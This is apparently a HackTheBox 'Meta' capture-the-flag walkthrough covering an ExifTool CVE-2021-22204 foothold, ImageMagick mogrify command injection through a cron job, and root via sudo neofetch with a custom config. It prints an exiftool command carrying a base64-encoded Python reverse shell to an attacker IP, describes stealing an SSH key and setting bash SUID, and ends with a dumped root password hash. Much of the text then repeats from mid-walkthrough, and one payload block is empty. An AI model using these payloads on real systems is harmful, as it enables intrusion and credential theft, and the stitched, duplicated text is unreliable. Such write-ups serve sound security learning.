# HackTheBox-Meta
## NMAP
```bash
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_ 256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80 (HTTP)
When visiting the site it resovles to domain name `artcorp.htb` , so add this to `hosts` file
So running to fuzz for files and directories using `dirsearch`
It didn't found anything interesting , since we have a domain name , we can fuzz for a subdomain using `wfuzz`
Now adding this to `hosts` file as well
Now here it's reading metdata from the image file with extension png or jpeg/jpg , I tried uploading a normal php file which the server responded with file not allowed
So let's try to add a comment which will have a php command into a legit png file
When we upload this to the site , it will remove this php comment
## Foothold
For this there's a CVE (CVE-2021-22204)
We can find the POC as well
https://github.com/OneSecCyber/JPEG_RCE
Clone the repo and use the `eval.config` file
```bash
exiftool -config eval.config image.png -eval='system("id")'
```
On uploading it you'll see the out of the command in `system`
To get a reverse shell we can use python3 to reverse shell payload and to not run into problem quotes problem I base64 encoded the payload so bash doesn't scream about double qutoes and single quotes
```bash
exiftool -config eval.config image.png -eval='system("echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjEyNSIsMjIyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTtvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKSc=' | base64 -d |bash")'
```
Start the listener and upload the file
After getting the shell , stabilize it with python3, checking `sudo -l` and other directories I wasn't able to find anything that could allow us to privesc to `thomas` user, so transfered `pspy` to monitor background processes and found that there was a cron job running as thomas
## Privilege Escalation (Thomas)
If we check the script which is being ran as thomas we can see that it's running `mogrify` , luckily this has an exploit which has command injection
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
So what script is actually doing is naviagting to `convert_images` in web directory and there it's running mogrify to convert image files to png format so we need to place our svg paylod there
```bash
```
After waiting for a minute for cron job to run the script
This will output the contents of thoma's ssh key in shm folder in a file named `uwu` , now just login through ssh
## Privilege Escalation (root)
Running `sudo -l` it shows that we can run `neofetch` as the root user
Here we can see that `env_reset` is used which means that we can't really exploit PATH variable to replace any command being ran in neofetch but there's `env_keep+=XDG_CONFIG_HOME` which allows us to use this variable for root user
Launching neofetch with default config
Here we see that it's using the defaut configuration file , now about the `env_keep` we can abuse neofetch by loading a config file , copy the config file from thomas's directory because the cron job will be replacing thie config file so avoid this we can create a folder `neofetch` and put the config file there
Now make a change to the default config to see if we are able to load a custom config file
```bash
sudo XDG_CONFIG_HOME=/home/thomas /usr/bin/neofetch
```
And this time it loads neofetch with showing users so it did work
Let's try to add a bash command in the config file , it could be any command so I am checking if it can make bash a SUID so we can get root
After running it we can see that bash has SUID bit on
And with this we got root
## References
- https://hackerone.com/reports/1154542
- https://github.com/OneSecCyber/JPEG_RCE
- https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
- https://blog.adithyanak.com/oscp-preparation-guide/linux-privilege-escalation/sudo-abuse
root:$6$C2RdQ0RpQ545cx/2$TMbXaoMwVs7XQVOwEwAnzcUVrIR5CdpVaM3Aoml8p9PWQWvxbrGrh/Y6d2.OuKlSHVsNVS0mJwSoGl.q8Pbug0:18996:0:99999:7:::
So running to fuzz for files and directories using `dirsearch`
It didn't found anything interesting , since we have a domain name , we can fuzz for a subdomain using `wfuzz`
Now adding this to `hosts` file as well
Now here it's reading metdata from the image file with extension png or jpeg/jpg , I tried uploading a normal php file which the server responded with file not allowed
So let's try to add a comment which will have a php command into a legit png file
When we upload this to the site , it will remove this php comment
## Foothold
For this there's a CVE (CVE-2021-22204)
We can find the POC as well
https://github.com/OneSecCyber/JPEG_RCE
Clone the repo and use the `eval.config` file
```bash
exiftool -config eval.config image.png -eval='system("id")'
```
On uploading it you'll see the out of the command in `system`
To get a reverse shell we can use python3 to reverse shell payload and to not run into problem quotes problem I base64 encoded the payload so bash doesn't scream about double qutoes and single quotes
```bash
exiftool -config eval.config image.png -eval='system("echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjEyNSIsMjIyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTtvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKSc=' | base64 -d |bash")'
```
Start the listener and upload the file
After getting the shell , stabilize it with python3, checking `sudo -l` and other directories I wasn't able to find anything that could allow us to privesc to `thomas` user, so transfered `pspy` to monitor background processes and found that there was a cron job running as thomas
## Privilege Escalation (Thomas)
If we check the script which is being ran as thomas we can see that it's running `mogrify` , luckily this has an exploit which has command injection
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
So what script is actually doing is naviagting to `convert_images` in web directory and there it's running mogrify to convert image files to png format so we need to place our svg paylod there
```bash
After waiting for a minute for cron job to run the script
This will output the contents of thoma's ssh key in shm folder in a file named `uwu` , now just login through ssh
## Privilege Escalation (root)
Running `sudo -l` it shows that we can run `neofetch` as the root user
Here we can see that `env_reset` is used which means that we can't really exploit PATH variable to replace any command being ran in neofetch but there's `env_keep+=XDG_CONFIG_HOME` which allows us to use this variable for root user
Launching neofetch with default config
Here we see that it's using the defaut configuration file , now about the `env_keep` we can abuse neofetch by loading a config file , copy the config file from thomas's directory because the cron job will be replacing thie config file so avoid this we can create a folder `neofetch` and put the config file there
Now make a change to the default config to see if we are able to load a custom config file
```bash
sudo XDG_CONFIG_HOME=/home/thomas /usr/bin/neofetch
```
And this time it loads neofetch with showing users so it did work
Let's try to add a bash command in the config file , it could be any command so I am checking if it can make bash a SUID so we can get root
After running it we can see that bash has SUID bit on
And with this we got root
## References
- https://hackerone.com/reports/1154542
- https://github.com/OneSecCyber/JPEG_RCE
- https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
- https://blog.adithyanak.com/oscp-preparation-guide/linux-privilege-escalation/sudo-abuse
root:$6$C2RdQ0RpQ545cx/2$TMbXaoMwVs7XQVOwEwAnzcUVrIR5CdpVaM3Aoml8p9PWQWvxbrGrh/Y6d2.OuKlSHVsNVS0mJwSoGl.q8Pbug0:18996:0:99999:7:::